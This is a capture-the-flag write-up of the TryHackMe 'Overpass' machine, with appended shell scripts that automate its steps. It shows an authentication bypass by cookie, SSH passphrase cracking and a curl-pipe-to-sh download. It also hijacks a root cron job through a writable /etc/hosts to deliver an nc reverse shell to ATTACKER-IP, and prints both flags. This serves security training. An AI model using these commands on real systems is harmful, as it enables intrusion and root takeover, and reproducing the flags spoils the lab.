# THM Overpass1 Write-up

## nmap

We can use `nmap -v -sV -sC -T4 10.10.249.77`

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
|   256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
|_  256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-favicon: Unknown favicon MD5: 0D4315E5A0B066CEFD5B216C8362564B
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Overpass
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

On visiting the IP (port 80) through a browser we get the following page

![](https://i.imgur.com/J7OjCCe.png)

---

We also have the **ssh** service open. It might be useful later.

## gobuster

Using gobuster as follows

`gobuster -u http://10.10.249.77/ -w /home/shivam/wordlists/common.txt -t 100`

We get

```
=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.249.77/
[+] Threads      : 100
[+] Wordlist     : /home/shivam/wordlists/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2022/06/23 22:47:51 Starting gobuster
=====================================================
/aboutus (Status: 301)
/admin (Status: 301)
/css (Status: 301)
/downloads (Status: 301)
/img (Status: 301)
/index.html (Status: 301)
=====================================================
2022/06/23 22:48:06 Finished
=====================================================
```

## Web exploitation

On visiting the pages found above, the **/admin** page seems interesting

![](https://i.imgur.com/08putco.png)

---

Let's check out the source code for the page

![](https://i.imgur.com/sJ4RZl6.png)

We can see three scripts:

1. main.js
2. login.js
3. cookie.js

Let's check out **login.js**

```
async function postData(url = '', data = {}) {
    // Default options are marked with *
    const response = await fetch(url, {
        method: 'POST', // *GET, POST, PUT, DELETE, etc.
        cache: 'no-cache', // *default, no-cache, reload, force-cache, only-if-cached
        credentials: 'same-origin', // include, *same-origin, omit
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded'
        },
        redirect: 'follow', // manual, *follow, error
        referrerPolicy: 'no-referrer', // no-referrer, *client
        body: encodeFormData(data) // body data type must match "Content-Type" header
    });
    return response; // We don't always want JSON back
}

const encodeFormData = (data) => {
    return Object.keys(data)
        .map(key => encodeURIComponent(key) + '=' + encodeURIComponent(data[key]))
        .join('&');
}

function onLoad() {
    document.querySelector("#loginForm").addEventListener("submit", function (event) {
        //on pressing enter
        event.preventDefault()
        login()
    });
}

async function login() {
    const usernameBox = document.querySelector("#username");
    const passwordBox = document.querySelector("#password");
    const loginStatus = document.querySelector("#loginStatus");
    loginStatus.textContent = ""
    const creds = { username: usernameBox.value, password: passwordBox.value }
    const response = await postData("/api/login", creds)
    const statusOrCookie = await response.text()
    if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials"
        passwordBox.value=""
    } else {
        Cookies.set("SessionToken",statusOrCookie)
        window.location = "/admin"
    }
}
```

The last **else** branch is the interesting part: whatever `/api/login` returns that is not the exact string `Incorrect credentials` is stored verbatim in a cookie named **SessionToken**, and the browser is then sent to `/admin`. The hint for the user flag says: `OWASP Top 10 Vuln! Do NOT bruteforce.` Hence this is most likely [**Broken Authentication**](https://code-maze.com/owasp-broken-authentication/), one of the OWASP Top 10 categories. The server only checks that a **SessionToken** cookie is present, not that it issued the value, so we can reach the admin page simply by setting a cookie named **SessionToken** with any value we like (even an empty value works).

![](https://i.imgur.com/v9nSlMK.png)

On saving the cookie and reloading the page we are taken to the admin page.

![](https://i.imgur.com/cO2siAE.png)

---

## ssh

On the admin page we are given an SSH private key that can be used to log in. Let's save it in a file named **privatekey** and restrict its permissions, since `ssh` refuses to use a key that other users can read:

`chmod 600 privatekey`

The admin page also shows the username for the SSH login, which is **james**. Let's try to log in:

`ssh -i privatekey james@10.10.249.77`

![](https://i.imgur.com/HlMeDI8.png)

It asks for a passphrase. The passphrase can be cracked with **John the Ripper**: **ssh2john** turns the encrypted private key into a hash that john understands (on Kali the wrapper is `ssh2john`; elsewhere the script ships with John as `ssh2john.py`). Write the hash into a file:

`ssh2john privatekey > privatekey.hash`

Let's crack it:

`john privatekey.hash --wordlist=/usr/share/wordlists/rockyou.txt`

![](https://i.imgur.com/o6c0xAw.png)

Hence the passphrase for the private key is

> james13

We can now log in over SSH with this passphrase and read the user flag

![](https://i.imgur.com/TjTpUs9.png)

```
james@overpass-prod:~$ ls
todo.txt  user.txt
james@overpass-prod:~$ cat user.txt
thm{65c1aaf000506e56996822c6281e6bf7}
```

The user flag is:

> thm{65c1aaf000506e56996822c6281e6bf7}

## Privilege Escalation

We can use **LinPEAS** to check for possible privilege escalation paths.

Download LinPEAS on the local system:

`wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh`

Host a simple Python HTTP server on the local system:

`sudo python3 -m http.server 80`

Download the script on the target and run it:

`curl 10.18.***.***/linpeas.sh | sh`

Under **cronjobs** we see an interesting task

![](https://i.imgur.com/KKX4HtI.png)

A job running as root makes a curl request to the host **overpass.thm** for the file **buildscript.sh** (under `downloads/src/`) and executes what it fetches. We can also see that **/etc/hosts**, the file that maps hostnames to IP addresses, is **writable** by our user.

![](https://i.imgur.com/3yN6NN7.png)

*We can change the IP of overpass.thm to the IP of our local machine and serve the same path (downloads/src/buildscript.sh) from it, with a buildscript.sh that contains a reverse shell, which the cron job will then execute as root.*

- Make the same directory layout on the attacking machine

    `mkdir -p ./downloads/src`

- Create **./downloads/src/buildscript.sh** containing a reverse shell. A suitable one-liner can be generated at [revshells.com](https://www.revshells.com/); replace ATTACKER-IP and PORT with your own values:

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ATTACKER-IP PORT >/tmp/f
```

- Host a simple Python HTTP server

    `sudo python3 -m http.server 80`

    Make sure the server is started in the parent directory of the *downloads* directory, so that the request path `/downloads/src/buildscript.sh` resolves.

- Listen on the chosen port on the local machine

    `nc -lvnp PORT`

- Change the IP for overpass.thm in /etc/hosts to your own. Note that only the file is writable, not the `/etc` directory, so the edit must overwrite the file in place (vim manages that here; `sed -i`, which writes a new file and renames it over the old one, would fail).

```
james@overpass-prod:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 overpass-prod
127.0.0.1 overpass.thm

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
james@overpass-prod:~$ vim /etc/hosts
james@overpass-prod:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 overpass-prod
10.18.118.144 overpass.thm

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```

Now we just have to wait for the cron job to make its request. When it fires, our server logs the fetch:

```
shivam@ubuntu:/$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.249.77 - - [24/Jun/2022 00:48:02] "GET /downloads/src/buildscript.sh HTTP/1.1" 200 -
```

And we get a root shell

![](https://i.imgur.com/DMA7ZCf.png)

The root flag is:

> thm{7f336f8c359dbac18d54fdd64ea753bb}
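Going back to the **/admin** finding: the broken-authentication claim can be confirmed from the command line instead of a browser cookie editor. The script below is an added example, not part of the original write-up. It fetches `/admin` once without a cookie and once with a made-up `SessionToken`, and reports whether the cookie's mere presence changes the answer. The two page markers are assumptions drawn from what the write-up shows: the login page is recognised by the `loginForm` element that login.js targets, the authenticated page by the PEM `PRIVATE KEY` block the admin page hands out.

```sh
# Added example (not from the write-up): confirm the presence-only SessionToken
# check with curl. Assumed markers: "loginForm" identifies the login page
# (login.js binds to #loginForm), "PRIVATE KEY" identifies the admin page.

# Return 0 if a saved /admin response looks like the authenticated page:
# no login form, and a PEM private-key block present.
looks_authenticated() {
    body_file="$1"
    if grep -q 'loginForm' "$body_file"; then
        return 1
    fi
    grep -q 'PRIVATE KEY' "$body_file"
}

# Fetch /admin with and without a made-up SessionToken and report whether the
# cookie's mere presence flips the response, i.e. the server never validates
# the token value it supposedly issued.
probe_admin() {
    target="$1"
    tmp="$(mktemp -d)"
    curl -s -o "$tmp/nocookie" "http://$target/admin"
    curl -s -o "$tmp/bogus" -b 'SessionToken=anything' "http://$target/admin"
    without=1; with=1
    looks_authenticated "$tmp/nocookie" && without=0
    looks_authenticated "$tmp/bogus" && with=0
    rm -rf "$tmp"
    if [ "$without" -ne 0 ] && [ "$with" -eq 0 ]; then
        echo "VULNERABLE: /admin served with an arbitrary SessionToken"
        return 0
    fi
    echo "not confirmed (without cookie: $without, with bogus cookie: $with)"
    return 1
}

# Usage: sh probe_admin.sh 10.10.249.77
if [ $# -ge 1 ]; then
    probe_admin "$1"
fi
```

If the unauthenticated fetch already returned the key, the page would simply be unprotected rather than mis-validating a token; the script distinguishes the two cases, which matters for how the finding is written up.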
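The privilege-escalation chain above, written out as shell functions so each step can be checked rather than done by hand. This is an added example and not code from the write-up: it finds cron entries that pipe `curl` output straight into a shell, checks whether the hosts file is writable, repoints the hostname in place (the `/etc` directory is not writable, so the file cannot be replaced, only overwritten), and stages the write-up's reverse-shell one-liner under the path the job requests. The crontab line it is exercised against is constructed from the write-up's description of the job, since the real line is only visible in the screenshot; the port 4444 is an assumption, the attacker IP 10.18.118.144 is the one the write-up uses.

```sh
# Added example, not part of the original write-up. The crontab line in the
# comments is constructed from the write-up's description of the root job.

# Print the host/path fetched by every cron line that pipes curl into sh or
# bash, e.g. "* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash"
# yields "overpass.thm/downloads/src/buildscript.sh". $1 is a crontab file
# such as /etc/crontab; the user field (root) is left for the reader to confirm.
find_curl_pipe_jobs() {
    grep -E 'curl[^|]*\|[[:space:]]*(ba)?sh' "$1" \
      | grep -v '^[[:space:]]*#' \
      | sed -E 's/.*curl[[:space:]]+(-[A-Za-z]+[[:space:]]+)*(https?:\/\/)?([^[:space:]|]+).*/\3/'
}

# Hostname part of a host/path string.
host_of() {
    printf '%s\n' "$1" | cut -d/ -f1
}

# Return 0 if $1 is writable by the current user (true for /etc/hosts on the box).
is_writable() {
    [ -w "$1" ]
}

# Point NAME ($2) at IP ($3) in the hosts file $1. The content is rewritten with
# cat so the existing inode is overwritten: sed -i or mv would create a new file
# in /etc, which a low-privileged user cannot do.
point_host_at() {
    hosts_file="$1"; name="$2"; ip="$3"
    tmp="$(mktemp)"
    grep -v -E "[[:space:]]$name([[:space:]]|\$)" "$hosts_file" > "$tmp" || true
    printf '%s %s\n' "$ip" "$name" >> "$tmp"
    cat "$tmp" > "$hosts_file"
    rm -f "$tmp"
}

# Create WEBROOT/downloads/src/buildscript.sh holding the reverse shell from the
# write-up, aimed at IP:PORT. Serve WEBROOT with "python3 -m http.server 80"
# and listen with "nc -lvnp PORT" before repointing the host. Prints the path.
stage_payload() {
    webroot="$1"; attacker_ip="$2"; port="$3"
    mkdir -p "$webroot/downloads/src"
    cat > "$webroot/downloads/src/buildscript.sh" <<EOF
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $attacker_ip $port >/tmp/f
EOF
    chmod +x "$webroot/downloads/src/buildscript.sh"
    printf '%s\n' "$webroot/downloads/src/buildscript.sh"
}
```

On the target, `find_curl_pipe_jobs /etc/crontab` and `is_writable /etc/hosts` are the enumeration; `stage_payload` runs on the attacking machine, and `point_host_at /etc/hosts overpass.thm 10.18.118.144` is the last step, after the listener and web server are up, because the next cron run will fetch the payload immediately.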